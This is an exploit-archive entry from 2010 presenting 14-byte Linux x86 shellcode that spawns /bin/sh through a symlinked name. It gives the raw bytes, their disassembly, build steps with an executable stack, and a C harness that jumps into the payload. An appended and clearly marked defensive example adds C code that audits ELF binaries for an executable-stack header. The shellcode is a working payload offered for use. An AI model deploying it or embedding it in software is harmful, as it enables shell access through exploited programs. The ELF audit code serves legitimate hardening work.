
# Title : 14 Bytes execve("a->/bin/sh") Local-only Shellcode
# Published : 2010-04-17
# Author : Magnefikko


#include <stdio.h>
#include <string.h>

/*
	by Magnefikko
	17.04.2010
	magnefikko@gmail.com
	Promhyl Studies :: http://promhyl.oz.pl
	Subgroup: #PRekambr
	Name: 14 bytes execve("a->/bin/sh") local-only shellcode
	Platform: Linux x86
	
	execve("a", 0, 0);

	$ ln -s /bin/sh a
	$ gcc -Wl,-z,execstack filename.c
	$ ./a.out
	
	Link is required.

	shellcode:

	\x31\xc0\x50\x6a\x61\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80

*/


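int main(void){
	/*
	 * 31 c0   xor  eax, eax
	 * 50      push eax
	 * 6a 61   push 0x61        ; "a" followed by NUL bytes
	 * 89 e3   mov  ebx, esp    ; ebx -> "a"
	 * 99      cdq              ; edx = 0
	 * 50      push eax
	 * b0 0b   mov  al, 0x0b    ; execve syscall number
	 * 59      pop  ecx         ; ecx = 0
	 * cd 80   int  0x80        ; execve("a", 0, 0)
	 */
	char shell[] = "\x31\xc0\x50\x6a\x61\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80";
	/* strlen() returns size_t, so print it with %zu */
	printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell) = %zu\n", strlen(shell));
	/* shell[] lives on the stack; the call only works with an executable stack (-z execstack) */
	(*(void (*)()) shell)();
	return 0;
}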
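
The build line in the header comment needs -Wl,-z,execstack because the bytes are run from a stack array; in the resulting binary that choice is recorded as the execute bit on the PT_GNU_STACK program header, which is what an auditor can check. The following is an added example, not part of the original entry or the author's code: it reads that bit from a little-endian ELF32 or ELF64 image. The names stack_exec_status and build_sample and the constructed 84-byte sample image are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK_TYPE 0x6474e551u /* p_type of the stack-permission header */
#define PF_X_FLAG 0x1u                /* execute bit in p_flags */

static uint64_t rd_le(const uint8_t *p, int n) { /* n-byte little-endian read */
    uint64_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* 1 = stack marked executable, 0 = non-executable, 2 = no PT_GNU_STACK header
 * (kernel applies its architecture default), -1 = not a parseable LE ELF. */
int stack_exec_status(const uint8_t *img, size_t len) {
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1) return -1;
    int is64 = (img[4] == 2);
    if ((!is64 && img[4] != 1) || (is64 && len < 64)) return -1;
    uint64_t phoff = rd_le(img + (is64 ? 32 : 28), is64 ? 8 : 4);
    uint64_t entsz = rd_le(img + (is64 ? 54 : 42), 2);
    uint64_t phnum = rd_le(img + (is64 ? 56 : 44), 2);
    /* Header fields are untrusted: the whole table must lie inside the image. */
    if (entsz < (is64 ? 56u : 32u) || phoff > len || phnum * entsz > len - phoff) return -1;
    for (uint64_t i = 0; i < phnum; i++) {
        const uint8_t *ph = img + phoff + i * entsz;
        if (rd_le(ph, 4) == PT_GNU_STACK_TYPE)
            return (rd_le(ph + (is64 ? 4 : 24), 4) & PF_X_FLAG) ? 1 : 0;
    }
    return 2;
}

/* Constructed sample: a minimal ELF32 image (84 bytes) whose only program
 * header has the given type and flags. It is not a runnable binary. */
void build_sample(uint8_t img[84], uint32_t p_type, uint32_t p_flags) {
    memset(img, 0, 84);
    memcpy(img, "\x7f" "ELF\x01\x01\x01", 7);  /* ELFCLASS32, little-endian */
    img[28] = 52; img[42] = 32; img[44] = 1;   /* e_phoff, e_phentsize, e_phnum */
    for (int i = 0; i < 4; i++) {
        img[52 + i] = (uint8_t)(p_type >> (8 * i));       /* p_type at offset 0 */
        img[52 + 24 + i] = (uint8_t)(p_flags >> (8 * i)); /* p_flags at offset 24 */
    }
}

int main(void) {
    uint8_t img[84];
    build_sample(img, PT_GNU_STACK_TYPE, 7); /* RWX, as -z execstack produces */
    return printf("execstack sample: %d\n", stack_exec_status(img, sizeof img)) < 0;
}
```

On 32-bit x86 a result of 2 deserves the same attention as 1, because the kernel's default for a binary without a PT_GNU_STACK header is an executable stack.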